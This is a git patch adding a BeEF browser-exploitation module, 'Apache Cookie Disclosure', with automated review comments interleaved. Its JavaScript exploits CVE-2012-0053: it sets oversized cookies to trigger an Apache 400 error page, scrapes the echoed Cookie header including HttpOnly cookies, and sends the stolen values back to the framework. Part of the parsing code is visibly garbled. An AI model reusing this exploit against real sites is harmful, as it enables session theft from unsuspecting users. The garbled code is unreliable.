From 6abb21ac5341954dbd8fdb6e832ce47223142fe1 Mon Sep 17 00:00:00 2001
From: gcatt
Date: Tue, 19 Mar 2013 17:29:48 +0100
Subject: [PATCH] Module: Apache HTTP Server cookie disclosure (exploit)
---
 .gitignore | 2 +
 .../apache_cookie_disclosure/command.js | 75 +++++++++++++++++++
 .../apache_cookie_disclosure/config.yaml | 15 ++++
 .../apache_cookie_disclosure/module.rb | 14 ++++
 4 files changed, 106 insertions(+)
 create mode 100644 modules/exploits/apache_cookie_disclosure/command.js
 create mode 100644 modules/exploits/apache_cookie_disclosure/config.yaml
 create mode 100644 modules/exploits/apache_cookie_disclosure/module.rb
diff --git a/.gitignore b/.gitignore
index 7494b2b02..7dacad784 100644
--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,5 @@ custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
+
+*.lock
diff --git a/modules/exploits/apache_cookie_disclosure/command.js b/modules/exploits/apache_cookie_disclosure/command.js
new file mode 100644
index 000000000..b695e4838
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
+beef.execute(function() {
+
+ function setCookies (good) {
+
+ var str = "";
+
+ for (var i=0; i< 819; i++) {
+ str += "z";
+ }
+
+ for (i = 0; i < 10; i++) {
+
+ if (good) { // Expire evil cookie
+ var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";
+ } else { // Set evil cookie
+ var cookie = "beef" + i + "=" + str + "; path=/";
+ }
+ document.cookie = cookie;
+ }
+ }
+
+ function makeRequest() {
+ setCookies();
+
+ function parseCookies () {
+ var cookie_dict = {};
+
+ // React on 400 status
+ if (xhr.readyState === 4 && xhr.status === 400) {
+
+ // Replace newlines and match
 content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/
(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});
\ No newline at end of file
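Review bot: The header comment only cites the gist this file was derived from; the vulnerability the module depends on is stated nowhere in the code, so a maintainer has to read config.yaml to learn it. A header line such as `// Depends on CVE-2012-0053 (Apache HTTP Server 2.2.0 through 2.2.21, per config.yaml): the 400 error body echoes the request's Cookie header, which is why the response is only parsed when xhr.status === 400.` would make that explicit. As a point of style, `var cookie` is declared in both branches of the `if` in `setCookies`; declaring it once before the `if` and assigning in each branch is the cleaner form. The lines between `// Replace newlines and match` and the `// Make XHR request` block appear garbled in this copy (tag text was stripped by extraction), so the cookie-parsing loop body cannot be reviewed here.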
diff --git a/modules/exploits/apache_cookie_disclosure/config.yaml b/modules/exploits/apache_cookie_disclosure/config.yaml
new file mode 100644
index 000000000..e8f0fcf47
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
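Review bot: The module key on the `apache_cookies:` line does not match the directory name `apache_cookie_disclosure` used for all three new files, while module.rb names its class `Apache_cookies`. If BeEF resolves a module's config entry and class from its directory name, as its layout suggests, this entry will not be picked up; whichever name is intended, the directory, the config key and the class name should agree. The `description` is the only place that records the CVE and the affected version range, so it should stay accurate if that range is ever revised.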
diff --git a/modules/exploits/apache_cookie_disclosure/module.rb b/modules/exploits/apache_cookie_disclosure/module.rb
new file mode 100644
index 000000000..22115ed86
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end
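Review bot: `post_execute` has no comment saying what it persists, and building `content` as an empty hash followed by one key assignment is better written as a literal: `# Persist the value returned by command.js into this module's results` followed by `content = { 'apache_cookies' => @datastore['apache_cookies'] }` and `save content`. The file also indents with tabs, whereas Ruby convention is two spaces; matching the rest of the repository's modules is preferable if they use spaces.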